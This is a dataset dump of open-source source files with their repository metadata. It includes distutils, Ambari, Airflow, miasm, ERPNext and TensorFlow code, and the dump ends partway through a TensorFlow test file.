repo_name stringlengths 6-100 | path stringlengths 4-294 | copies stringlengths 1-5 | size stringlengths 4-6 | content stringlengths 606-896k | license stringclasses 15 values
---|---|---|---|---|---|
thomasrogers03/phantomjs | src/qt/qtwebkit/Tools/QueueStatusServer/config/messages.py | 119 | 1677 | # Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# These must be in sync with webkit-patch's AbstractQueue.
pass_status = "Pass"
fail_status = "Fail"
retry_status = "Retry"
error_status = "Error"
| bsd-3-clause |
hynnet/openwrt-mt7620 | staging_dir/target-mipsel_r2_uClibc-0.9.33.2/root-ralink/usr/lib/python2.7/distutils/emxccompiler.py | 250 | 11931 | """distutils.emxccompiler
Provides the EMXCCompiler class, a subclass of UnixCCompiler that
handles the EMX port of the GNU C compiler to OS/2.
"""
# issues:
#
# * OS/2 insists that DLLs can have names no longer than 8 characters.
# We put export_symbols in a def-file, as though the DLL can have
# an arbitrary length name, but truncate the output filename.
#
# * only use OMF objects and use LINK386 as the linker (-Zomf)
#
# * always build for multithreading (-Zmt) as the accompanying OS/2 port
# of Python is only distributed with threads enabled.
#
# tested configurations:
#
# * EMX gcc 2.81/EMX 0.9d fix03
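#
# A minimal usage sketch (illustrative assumption, not part of the original
# module -- distutils normally instantiates this class for you via
# distutils.ccompiler.new_compiler()):
#
#   from distutils.emxccompiler import EMXCCompiler
#   compiler = EMXCCompiler(verbose=1)
#   objects = compiler.compile(['spam.c'], output_dir='build')
#   compiler.link(compiler.SHARED_OBJECT, objects, 'spam.dll',
#                 export_symbols=['initspam'])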
__revision__ = "$Id$"
import os, sys, copy
from distutils.ccompiler import gen_preprocess_options, gen_lib_options
from distutils.unixccompiler import UnixCCompiler
from distutils.file_util import write_file
from distutils.errors import DistutilsExecError, CompileError, UnknownFileError
from distutils import log
class EMXCCompiler (UnixCCompiler):
compiler_type = 'emx'
obj_extension = ".obj"
static_lib_extension = ".lib"
shared_lib_extension = ".dll"
static_lib_format = "%s%s"
shared_lib_format = "%s%s"
res_extension = ".res" # compiled resource file
exe_extension = ".exe"
def __init__ (self,
verbose=0,
dry_run=0,
force=0):
UnixCCompiler.__init__ (self, verbose, dry_run, force)
(status, details) = check_config_h()
self.debug_print("Python's GCC status: %s (details: %s)" %
(status, details))
if status is not CONFIG_H_OK:
self.warn(
"Python's pyconfig.h doesn't seem to support your compiler. " +
("Reason: %s." % details) +
"Compiling may fail because of undefined preprocessor macros.")
(self.gcc_version, self.ld_version) = \
get_versions()
self.debug_print(self.compiler_type + ": gcc %s, ld %s\n" %
(self.gcc_version,
self.ld_version) )
# Hard-code GCC because that's what this is all about.
# XXX optimization, warnings etc. should be customizable.
self.set_executables(compiler='gcc -Zomf -Zmt -O3 -fomit-frame-pointer -mprobe -Wall',
compiler_so='gcc -Zomf -Zmt -O3 -fomit-frame-pointer -mprobe -Wall',
linker_exe='gcc -Zomf -Zmt -Zcrtdll',
linker_so='gcc -Zomf -Zmt -Zcrtdll -Zdll')
# want the gcc library statically linked (so that we don't have
# to distribute a version dependent on the compiler we have)
self.dll_libraries=["gcc"]
# __init__ ()
def _compile(self, obj, src, ext, cc_args, extra_postargs, pp_opts):
if ext == '.rc':
# gcc requires '.rc' compiled to binary ('.res') files !!!
try:
self.spawn(["rc", "-r", src])
except DistutilsExecError, msg:
raise CompileError, msg
else: # for other files use the C-compiler
try:
self.spawn(self.compiler_so + cc_args + [src, '-o', obj] +
extra_postargs)
except DistutilsExecError, msg:
raise CompileError, msg
def link (self,
target_desc,
objects,
output_filename,
output_dir=None,
libraries=None,
library_dirs=None,
runtime_library_dirs=None,
export_symbols=None,
debug=0,
extra_preargs=None,
extra_postargs=None,
build_temp=None,
target_lang=None):
# use separate copies, so we can modify the lists
extra_preargs = copy.copy(extra_preargs or [])
libraries = copy.copy(libraries or [])
objects = copy.copy(objects or [])
# Additional libraries
libraries.extend(self.dll_libraries)
# handle export symbols by creating a def-file
# with executables this only works with gcc/ld as linker
if ((export_symbols is not None) and
(target_desc != self.EXECUTABLE)):
            # (The linker doesn't do anything if the output is up-to-date.
            # So it would probably be better to check whether we really need
            # this, but that would require duplicating unchanged parts of
            # UnixCCompiler, which is not what we want.)
            # We want to put the helper files in the same directory as the
            # object files; build_temp doesn't help much here.
            # Where are the object files:
temp_dir = os.path.dirname(objects[0])
            # name of the dll, used to give the helper files the same base name
(dll_name, dll_extension) = os.path.splitext(
os.path.basename(output_filename))
# generate the filenames for these files
def_file = os.path.join(temp_dir, dll_name + ".def")
# Generate .def file
contents = [
"LIBRARY %s INITINSTANCE TERMINSTANCE" % \
os.path.splitext(os.path.basename(output_filename))[0],
"DATA MULTIPLE NONSHARED",
"EXPORTS"]
for sym in export_symbols:
contents.append(' "%s"' % sym)
self.execute(write_file, (def_file, contents),
"writing %s" % def_file)
            # next, add options for the def-file and for creating import libraries
            # for gcc/ld the def-file is specified like any other object file
objects.append(def_file)
        #end: if ((export_symbols is not None) and
        #    (target_desc != self.EXECUTABLE)):
        # Anyone who wants symbols and a much larger output file should
        # explicitly switch the debug mode on; otherwise we let dllwrap/ld
        # strip the output file
        # (On my machine: 10KB < stripped_file < ??100KB
        #   unstripped_file = stripped_file + XXX KB
        #  ( XXX=254 for a typical python extension))
if not debug:
extra_preargs.append("-s")
UnixCCompiler.link(self,
target_desc,
objects,
output_filename,
output_dir,
libraries,
library_dirs,
runtime_library_dirs,
None, # export_symbols, we do this in our def-file
debug,
extra_preargs,
extra_postargs,
build_temp,
target_lang)
# link ()
# -- Miscellaneous methods -----------------------------------------
# override the object_filenames method from CCompiler to
# support rc and res-files
def object_filenames (self,
source_filenames,
strip_dir=0,
output_dir=''):
if output_dir is None: output_dir = ''
obj_names = []
for src_name in source_filenames:
# use normcase to make sure '.rc' is really '.rc' and not '.RC'
(base, ext) = os.path.splitext (os.path.normcase(src_name))
if ext not in (self.src_extensions + ['.rc']):
raise UnknownFileError, \
"unknown file type '%s' (from '%s')" % \
(ext, src_name)
if strip_dir:
base = os.path.basename (base)
if ext == '.rc':
# these need to be compiled to object files
obj_names.append (os.path.join (output_dir,
base + self.res_extension))
else:
obj_names.append (os.path.join (output_dir,
base + self.obj_extension))
return obj_names
# object_filenames ()
# override the find_library_file method from UnixCCompiler
# to deal with file naming/searching differences
def find_library_file(self, dirs, lib, debug=0):
shortlib = '%s.lib' % lib
        longlib = 'lib%s.lib' % lib   # this form is very rare
# get EMX's default library directory search path
try:
emx_dirs = os.environ['LIBRARY_PATH'].split(';')
except KeyError:
emx_dirs = []
for dir in dirs + emx_dirs:
shortlibp = os.path.join(dir, shortlib)
longlibp = os.path.join(dir, longlib)
if os.path.exists(shortlibp):
return shortlibp
elif os.path.exists(longlibp):
return longlibp
# Oops, didn't find it in *any* of 'dirs'
return None
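    # Example of the search order implemented above: find_library_file(
    # ['/emx/lib'], 'socket') checks /emx/lib/socket.lib, then
    # /emx/lib/libsocket.lib, and repeats that pair for each directory in
    # LIBRARY_PATH, returning the first existing path (or None).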
# class EMXCCompiler
# Because these compilers aren't configured in Python's pyconfig.h file by
# default, we should at least warn the user if they are using an unmodified
# version.
CONFIG_H_OK = "ok"
CONFIG_H_NOTOK = "not ok"
CONFIG_H_UNCERTAIN = "uncertain"
def check_config_h():
"""Check if the current Python installation (specifically, pyconfig.h)
appears amenable to building extensions with GCC. Returns a tuple
(status, details), where 'status' is one of the following constants:
CONFIG_H_OK
all is well, go ahead and compile
CONFIG_H_NOTOK
doesn't look good
CONFIG_H_UNCERTAIN
not sure -- unable to read pyconfig.h
'details' is a human-readable string explaining the situation.
Note there are two ways to conclude "OK": either 'sys.version' contains
the string "GCC" (implying that this Python was built with GCC), or the
installed "pyconfig.h" contains the string "__GNUC__".
"""
# XXX since this function also checks sys.version, it's not strictly a
# "pyconfig.h" check -- should probably be renamed...
from distutils import sysconfig
import string
# if sys.version contains GCC then python was compiled with
# GCC, and the pyconfig.h file should be OK
if string.find(sys.version,"GCC") >= 0:
return (CONFIG_H_OK, "sys.version mentions 'GCC'")
fn = sysconfig.get_config_h_filename()
try:
        # It would probably be better to read single lines to search.
        # But we do this only once, and it is fast enough.
f = open(fn)
try:
s = f.read()
finally:
f.close()
except IOError, exc:
# if we can't read this file, we cannot say it is wrong
# the compiler will complain later about this file as missing
return (CONFIG_H_UNCERTAIN,
"couldn't read '%s': %s" % (fn, exc.strerror))
else:
# "pyconfig.h" contains an "#ifdef __GNUC__" or something similar
if string.find(s,"__GNUC__") >= 0:
return (CONFIG_H_OK, "'%s' mentions '__GNUC__'" % fn)
else:
return (CONFIG_H_NOTOK, "'%s' does not mention '__GNUC__'" % fn)
def get_versions():
""" Try to find out the versions of gcc and ld.
If not possible it returns None for it.
"""
from distutils.version import StrictVersion
from distutils.spawn import find_executable
import re
gcc_exe = find_executable('gcc')
if gcc_exe:
out = os.popen(gcc_exe + ' -dumpversion','r')
try:
out_string = out.read()
finally:
out.close()
        result = re.search(r'(\d+\.\d+\.\d+)', out_string)
if result:
gcc_version = StrictVersion(result.group(1))
else:
gcc_version = None
else:
gcc_version = None
# EMX ld has no way of reporting version number, and we use GCC
# anyway - so we can link OMF DLLs
ld_version = None
return (gcc_version, ld_version)
| gpl-2.0 |
arenadata/ambari | ambari-server/src/main/resources/common-services/AMBARI_INFRA/0.1.0/package/scripts/setup_infra_solr.py | 2 | 5041 | """
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from resource_management.core.exceptions import Fail
from resource_management.core.source import InlineTemplate, Template
from resource_management.core.resources.system import Directory, File
from resource_management.libraries.functions.decorator import retry
from resource_management.libraries.functions.format import format
from resource_management.libraries.functions import solr_cloud_util
def setup_infra_solr(name = None):
import params
if name == 'server':
Directory([params.infra_solr_log_dir, params.infra_solr_piddir,
params.infra_solr_datadir, params.infra_solr_data_resources_dir],
mode=0755,
cd_access='a',
create_parents=True,
owner=params.infra_solr_user,
group=params.user_group
)
Directory([params.solr_dir, params.infra_solr_conf],
mode=0755,
cd_access='a',
owner=params.infra_solr_user,
group=params.user_group,
create_parents=True,
recursive_ownership=True
)
File(params.infra_solr_log,
mode=0644,
owner=params.infra_solr_user,
group=params.user_group,
content=''
)
File(format("{infra_solr_conf}/infra-solr-env.sh"),
content=InlineTemplate(params.solr_env_content),
mode=0755,
owner=params.infra_solr_user,
group=params.user_group
)
File(format("{infra_solr_datadir}/solr.xml"),
content=InlineTemplate(params.solr_xml_content),
owner=params.infra_solr_user,
group=params.user_group
)
File(format("{infra_solr_conf}/log4j.properties"),
content=InlineTemplate(params.solr_log4j_content),
owner=params.infra_solr_user,
group=params.user_group
)
custom_security_json_location = format("{infra_solr_conf}/custom-security.json")
File(custom_security_json_location,
content=InlineTemplate(params.infra_solr_security_json_content),
owner=params.infra_solr_user,
group=params.user_group,
mode=0640
)
jaas_file = params.infra_solr_jaas_file if params.security_enabled else None
url_scheme = 'https' if params.infra_solr_ssl_enabled else 'http'
create_ambari_solr_znode()
security_json_file_location = custom_security_json_location \
if params.infra_solr_security_json_content and str(params.infra_solr_security_json_content).strip() \
else format("{infra_solr_conf}/security.json") # security.json file to upload
if params.security_enabled:
File(format("{infra_solr_jaas_file}"),
content=Template("infra_solr_jaas.conf.j2"),
owner=params.infra_solr_user)
File(format("{infra_solr_conf}/security.json"),
content=Template("infra-solr-security.json.j2"),
owner=params.infra_solr_user,
group=params.user_group,
mode=0640)
solr_cloud_util.set_cluster_prop(
zookeeper_quorum=params.zookeeper_quorum,
solr_znode=params.infra_solr_znode,
java64_home=params.java64_home,
prop_name="urlScheme",
prop_value=url_scheme,
jaas_file=jaas_file
)
solr_cloud_util.setup_kerberos_plugin(
zookeeper_quorum=params.zookeeper_quorum,
solr_znode=params.infra_solr_znode,
jaas_file=jaas_file,
java64_home=params.java64_home,
secure=params.security_enabled,
security_json_location=security_json_file_location
)
if params.security_enabled:
solr_cloud_util.secure_solr_znode(
zookeeper_quorum=params.zookeeper_quorum,
solr_znode=params.infra_solr_znode,
jaas_file=jaas_file,
java64_home=params.java64_home,
sasl_users_str=params.infra_solr_sasl_user
)
elif name == 'client':
solr_cloud_util.setup_solr_client(params.config)
  else:
    raise Fail('Neither client nor server was selected for installation.')
@retry(times=30, sleep_time=5, err_class=Fail)
def create_ambari_solr_znode():
import params
solr_cloud_util.create_znode(
zookeeper_quorum=params.zookeeper_quorum,
solr_znode=params.infra_solr_znode,
java64_home=params.java64_home,
retry=30, interval=5) | apache-2.0 |
alqfahad/odoo | addons/fetchmail/__init__.py | 437 | 1120 | #-*- coding:utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# [email protected]
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import fetchmail
import res_config
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
MobinRanjbar/hue | desktop/core/ext-py/South-1.0.2/south/introspection_plugins/geodjango.py | 153 | 1286 | """
GeoDjango introspection rules
"""
import django
from django.conf import settings
from south.modelsinspector import add_introspection_rules
has_gis = "django.contrib.gis" in settings.INSTALLED_APPS
if has_gis:
    # Alright, import the field
from django.contrib.gis.db.models.fields import GeometryField
# Make some introspection rules
if django.VERSION[0] == 1 and django.VERSION[1] >= 1:
# Django 1.1's gis module renamed these.
rules = [
(
(GeometryField, ),
[],
{
"srid": ["srid", {"default": 4326}],
"spatial_index": ["spatial_index", {"default": True}],
"dim": ["dim", {"default": 2}],
"geography": ["geography", {"default": False}],
},
),
]
else:
rules = [
(
(GeometryField, ),
[],
{
"srid": ["_srid", {"default": 4326}],
"spatial_index": ["_index", {"default": True}],
"dim": ["_dim", {"default": 2}],
},
),
]
# Install them
    add_introspection_rules(rules, [r"^django\.contrib\.gis"])
rcatwood/Savu | savu/plugins/loaders/image_loader.py | 1 | 3329 | # Copyright 2014 Diamond Light Source Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. module:: temp_loader
:platform: Unix
:synopsis: A class for loading standard tomography data in a variety of
formats.
.. moduleauthor:: Nicola Wadeson <[email protected]>
"""
import h5py
import tempfile
import numpy as np
from savu.plugins.base_loader import BaseLoader
from savu.plugins.utils import register_plugin
@register_plugin
class ImageLoader(BaseLoader):
"""
A class to load tomography data from a Nexus file
:param image_type: Type of image. Choose from 'FabIO'. Default: 'FabIO'.
:param angles: A python statement to be evaluated or a file. Default: None.
:param frame_dim: Which dimension requires stitching? Default: 0.
"""
def __init__(self, name='ImageLoader'):
super(ImageLoader, self).__init__(name)
def setup(self):
exp = self.exp
data_obj = exp.create_data_object('in_data', 'tomo')
rot = 0
detY = 1
detX = 2
data_obj.set_axis_labels('rotation_angle.degrees',
'detector_y.pixel',
'detector_x.pixel')
data_obj.add_pattern('PROJECTION', core_dir=(detX, detY),
slice_dir=(rot,))
data_obj.add_pattern('SINOGRAM', core_dir=(detX, rot),
slice_dir=(detY,))
dtype = self.parameters['image_type']
mod = __import__('savu.data.data_structures.data_type', fromlist=dtype)
clazz = getattr(mod, dtype)
path = exp.meta_data.get_meta_data("data_file")
data_obj.data = clazz(path, data_obj, [self.parameters['frame_dim']])
self.set_rotation_angles(data_obj)
# dummy file
filename = path.split('/')[-1] + '.h5'
data_obj.backing_file = \
h5py.File(tempfile.mkdtemp() + '/' + filename, 'a')
data_obj.set_shape(data_obj.data.get_shape())
self.set_data_reduction_params(data_obj)
def set_rotation_angles(self, data_obj):
angles = self.parameters['angles']
if angles is None:
angles = np.linspace(0, 180, data_obj.data.get_shape()[0])
else:
try:
exec("angles = " + angles)
except:
try:
angles = np.loadtxt(angles)
except:
raise Exception('Cannot set angles in loader.')
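        # Illustrative parameter values (assumptions, not from the original
        # docs): angles = "np.linspace(0, 180, 91)" is executed as a python
        # statement above, while angles = "/path/to/angles.txt" fails the
        # exec and is loaded via np.loadtxt instead.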
n_angles = len(angles)
data_angles = data_obj.data.get_shape()[0]
        if data_angles != n_angles:
            raise Exception("The number of angles %s does not match the data "
                            "dimension length %s" % (n_angles, data_angles))
data_obj.meta_data.set_meta_data("rotation_angle", angles)
| gpl-3.0 |
courtarro/gnuradio | gr-channels/python/channels/__init__.py | 54 | 1350 | #
# Copyright 2012-2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
'''
Blocks for channel models and related functions.
'''
import os
try:
from channels_swig import *
except ImportError:
dirname, filename = os.path.split(os.path.abspath(__file__))
__path__.append(os.path.join(dirname, "..", "..", "swig"))
from channels_swig import *
# Blocks for Hardware Impairments
from amp_bal import *
from conj_fs_iqcorr import *
from distortion_2_gen import *
from distortion_3_gen import *
from iqbal_gen import *
from impairments import *
from phase_bal import *
from phase_noise_gen import *
from quantizer import *
| gpl-3.0 |
suyashphadtare/test | erpnext/hr/doctype/appraisal/appraisal.py | 1 | 2344 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import flt, getdate
from frappe import _
from frappe.model.mapper import get_mapped_doc
from frappe.model.document import Document
from erpnext.hr.utils import set_employee_name
class Appraisal(Document):
def validate(self):
if not self.status:
self.status = "Draft"
set_employee_name(self)
self.validate_dates()
self.validate_existing_appraisal()
self.calculate_total()
def get_employee_name(self):
self.employee_name = frappe.db.get_value("Employee", self.employee, "employee_name")
return self.employee_name
def validate_dates(self):
if getdate(self.start_date) > getdate(self.end_date):
frappe.throw(_("End Date can not be less than Start Date"))
def validate_existing_appraisal(self):
chk = frappe.db.sql("""select name from tabAppraisal where employee=%s
and (status='Submitted' or status='Completed')
and ((start_date>=%s and start_date<=%s)
or (end_date>=%s and end_date<=%s))""",
(self.employee,self.start_date,self.end_date,self.start_date,self.end_date))
if chk:
frappe.throw(_("Appraisal {0} created for Employee {1} in the given date range").format(chk[0][0], self.employee_name))
def calculate_total(self):
total, total_w = 0, 0
for d in self.get('appraisal_details'):
if d.score:
d.score_earned = flt(d.score) * flt(d.per_weightage) / 100
total = total + d.score_earned
total_w += flt(d.per_weightage)
if int(total_w) != 100:
frappe.throw(_("Total weightage assigned should be 100%. It is {0}").format(str(total_w) + "%"))
if frappe.db.get_value("Employee", self.employee, "user_id") != \
frappe.session.user and total == 0:
frappe.throw(_("Total cannot be zero"))
self.total_score = total
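	# Worked example (illustrative): two goals weighted 60% and 40% with
	# scores 4 and 5 yield score_earned values of 2.4 and 2.0 above, so
	# total_score = 4.4 and total_w = 100 passes the weightage check.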
def on_submit(self):
frappe.db.set(self, 'status', 'Submitted')
def on_cancel(self):
frappe.db.set(self, 'status', 'Cancelled')
@frappe.whitelist()
def fetch_appraisal_template(source_name, target_doc=None):
target_doc = get_mapped_doc("Appraisal Template", source_name, {
"Appraisal Template": {
"doctype": "Appraisal",
},
"Appraisal Template Goal": {
"doctype": "Appraisal Goal",
}
}, target_doc)
return target_doc
| agpl-3.0 |
chubbymaggie/miasm | example/disasm/callback.py | 2 | 1866 | from miasm2.core.bin_stream import bin_stream_str
from miasm2.core.asmblock import AsmLabel, AsmConstraint, expr_is_label
from miasm2.arch.x86.disasm import dis_x86_32, cb_x86_funcs
def cb_x86_callpop(cur_bloc, symbol_pool, *args, **kwargs):
"""
1000: call 1005
1005: pop
Will give:
1000: push 1005
1005: pop
"""
# Pattern matching
if len(cur_bloc.lines) < 1:
return
## We want to match a CALL, always the last line of a basic block
last_instr = cur_bloc.lines[-1]
if last_instr.name != 'CALL':
return
## The destination must be a label
dst = last_instr.args[0]
if not expr_is_label(dst):
return
## The destination must be the next instruction
if dst.name.offset != last_instr.offset + last_instr.l:
return
# Update instruction instance
last_instr.name = 'PUSH'
# Update next blocks to process in the disassembly engine
cur_bloc.bto.clear()
cur_bloc.add_cst(dst.name.offset, AsmConstraint.c_next, symbol_pool)
# Prepare a tiny shellcode
shellcode = ''.join(["\xe8\x00\x00\x00\x00", # CALL $
"X", # POP EAX
"\xc3", # RET
])
bin_stream = bin_stream_str(shellcode)
mdis = dis_x86_32(bin_stream)
print "Without callback:\n"
blocks = mdis.dis_multibloc(0)
print "\n".join(str(block) for block in blocks)
# Enable callback
cb_x86_funcs.append(cb_x86_callpop)
## Other method:
## mdis.dis_bloc_callback = cb_x86_callpop
# Clean disassembly cache
mdis.job_done.clear()
print "=" * 40
print "With callback:\n"
blocks_after = mdis.dis_multibloc(0)
print "\n".join(str(block) for block in blocks_after)
# Ensure the callback has been called
assert blocks.heads()[0].lines[0].name == "CALL"
assert blocks_after.heads()[0].lines[0].name == "PUSH"
| gpl-2.0 |
apache/airflow | airflow/providers/google/cloud/example_dags/example_gcs_to_bigquery.py | 10 | 2303 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Example DAG using GCSToBigQueryOperator.
"""
import os
from airflow import models
from airflow.providers.google.cloud.operators.bigquery import (
BigQueryCreateEmptyDatasetOperator,
BigQueryDeleteDatasetOperator,
)
from airflow.providers.google.cloud.transfers.gcs_to_bigquery import GCSToBigQueryOperator
from airflow.utils.dates import days_ago
DATASET_NAME = os.environ.get("GCP_DATASET_NAME", 'airflow_test')
TABLE_NAME = os.environ.get("GCP_TABLE_NAME", 'gcs_to_bq_table')
dag = models.DAG(
dag_id='example_gcs_to_bigquery_operator',
start_date=days_ago(2),
schedule_interval=None,
tags=['example'],
)
create_test_dataset = BigQueryCreateEmptyDatasetOperator(
task_id='create_airflow_test_dataset', dataset_id=DATASET_NAME, dag=dag
)
# [START howto_operator_gcs_to_bigquery]
load_csv = GCSToBigQueryOperator(
task_id='gcs_to_bigquery_example',
bucket='cloud-samples-data',
source_objects=['bigquery/us-states/us-states.csv'],
destination_project_dataset_table=f"{DATASET_NAME}.{TABLE_NAME}",
schema_fields=[
{'name': 'name', 'type': 'STRING', 'mode': 'NULLABLE'},
{'name': 'post_abbr', 'type': 'STRING', 'mode': 'NULLABLE'},
],
write_disposition='WRITE_TRUNCATE',
dag=dag,
)
# [END howto_operator_gcs_to_bigquery]
delete_test_dataset = BigQueryDeleteDatasetOperator(
task_id='delete_airflow_test_dataset', dataset_id=DATASET_NAME, delete_contents=True, dag=dag
)
create_test_dataset >> load_csv >> delete_test_dataset
| apache-2.0 |
rabipanda/tensorflow | tensorflow/contrib/metrics/python/kernel_tests/histogram_ops_test.py | 130 | 9577 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for histogram_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.metrics.python.ops import histogram_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class Strict1dCumsumTest(test.TestCase):
"""Test this private function."""
def test_empty_tensor_returns_empty(self):
with self.test_session():
tensor = constant_op.constant([])
result = histogram_ops._strict_1d_cumsum(tensor, 0)
expected = constant_op.constant([])
np.testing.assert_array_equal(expected.eval(), result.eval())
def test_length_1_tensor_works(self):
with self.test_session():
tensor = constant_op.constant([3], dtype=dtypes.float32)
result = histogram_ops._strict_1d_cumsum(tensor, 1)
expected = constant_op.constant([3], dtype=dtypes.float32)
np.testing.assert_array_equal(expected.eval(), result.eval())
def test_length_3_tensor_works(self):
with self.test_session():
tensor = constant_op.constant([1, 2, 3], dtype=dtypes.float32)
result = histogram_ops._strict_1d_cumsum(tensor, 3)
expected = constant_op.constant([1, 3, 6], dtype=dtypes.float32)
np.testing.assert_array_equal(expected.eval(), result.eval())
class AUCUsingHistogramTest(test.TestCase):
def setUp(self):
self.rng = np.random.RandomState(0)
def test_empty_labels_and_scores_gives_nan_auc(self):
with self.test_session():
labels = constant_op.constant([], shape=[0], dtype=dtypes.bool)
scores = constant_op.constant([], shape=[0], dtype=dtypes.float32)
score_range = [0, 1.]
auc, update_op = histogram_ops.auc_using_histogram(labels, scores,
score_range)
variables.local_variables_initializer().run()
update_op.run()
self.assertTrue(np.isnan(auc.eval()))
def test_perfect_scores_gives_auc_1(self):
self._check_auc(
nbins=100,
desired_auc=1.0,
score_range=[0, 1.],
num_records=50,
frac_true=0.5,
atol=0.05,
num_updates=1)
def test_terrible_scores_gives_auc_0(self):
self._check_auc(
nbins=100,
desired_auc=0.0,
score_range=[0, 1.],
num_records=50,
frac_true=0.5,
atol=0.05,
num_updates=1)
def test_many_common_conditions(self):
for nbins in [50]:
for desired_auc in [0.3, 0.5, 0.8]:
for score_range in [[-1, 1], [-10, 0]]:
for frac_true in [0.3, 0.8]:
# Tests pass with atol = 0.03. Moved up to 0.05 to avoid flakes.
self._check_auc(
nbins=nbins,
desired_auc=desired_auc,
score_range=score_range,
num_records=100,
frac_true=frac_true,
atol=0.05,
num_updates=50)
def test_large_class_imbalance_still_ok(self):
# With probability frac_true ** num_records, each batch contains only True
# records. In this case, ~ 95%.
# Tests pass with atol = 0.02. Increased to 0.05 to avoid flakes.
self._check_auc(
nbins=100,
desired_auc=0.8,
score_range=[-1, 1.],
num_records=10,
frac_true=0.995,
atol=0.05,
num_updates=1000)
def test_super_accuracy_with_many_bins_and_records(self):
# Test passes with atol = 0.0005. Increased atol to avoid flakes.
self._check_auc(
nbins=1000,
desired_auc=0.75,
score_range=[0, 1.],
num_records=1000,
frac_true=0.5,
atol=0.005,
num_updates=100)
def _check_auc(self,
nbins=100,
desired_auc=0.75,
score_range=None,
num_records=50,
frac_true=0.5,
atol=0.05,
num_updates=10):
"""Check auc accuracy against synthetic data.
Args:
nbins: nbins arg from contrib.metrics.auc_using_histogram.
desired_auc: Number in [0, 1]. The desired auc for synthetic data.
score_range: 2-tuple, (low, high), giving the range of the resultant
scores. Defaults to [0, 1.].
